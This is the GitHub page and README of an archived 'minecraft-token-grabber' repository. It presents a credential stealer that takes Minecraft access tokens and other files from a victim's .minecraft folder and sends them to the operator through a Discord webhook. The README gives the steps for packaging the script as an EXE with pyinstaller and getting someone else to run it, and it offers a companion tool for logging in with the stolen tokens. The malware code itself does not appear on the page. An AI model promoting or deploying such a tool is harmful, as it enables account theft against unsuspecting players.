Skip to content
This repository has been archived by the owner on Aug 7, 2022. It is now read-only.

A cool (but messy made) tool that grabs the access token from a user's .minecraft folder and sends it (as well as other info) through a webhook!

License

Notifications You must be signed in to change notification settings

spinfal/minecraft-token-grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

Archived

I will no longer maintain this code, and I believe that this does not work anymore or as well as it used to.

MCToken Grabber

A simple way to gain access to a Minecraft account. No username/email/password needed.

Having issues?

  • Yeah I made this at 4am give me a break
  • Open an issue with the Error code you're getting (if applicable).

How does this work?

  • When someone runs the mc-token file, it grabs the Access token from their .minecraft folder and some other files. It then sends it all over a webhook to your server.

How can I get someone to run mc-token?

  • First off just to be safe; you should run pip install discord_webhook (only YOU need to run that command, not the person you are sending it to)
  • Then use something like pyinstaller to turn it into an EXE file, and have someone run it
  • pyinstaller --onefile mc-token.py

How do I use the Token Login tool?

  • Simply download then run the EXE file and follow the prompts it gives you

Extra Info

  • I wrote/made all of this, but I got some sort of inspiration from this repo: wodxgod/Minecraft-Session-Token-Stealer. This code and tool I made is in no way as advanced as wodxgod's, but it does work.

About

A cool (but messy made) tool that grabs the access token from a user's .minecraft folder and sends it (as well as other info) through a webhook!

Topics

Resources

License

Stars

Watchers

Forks

Languages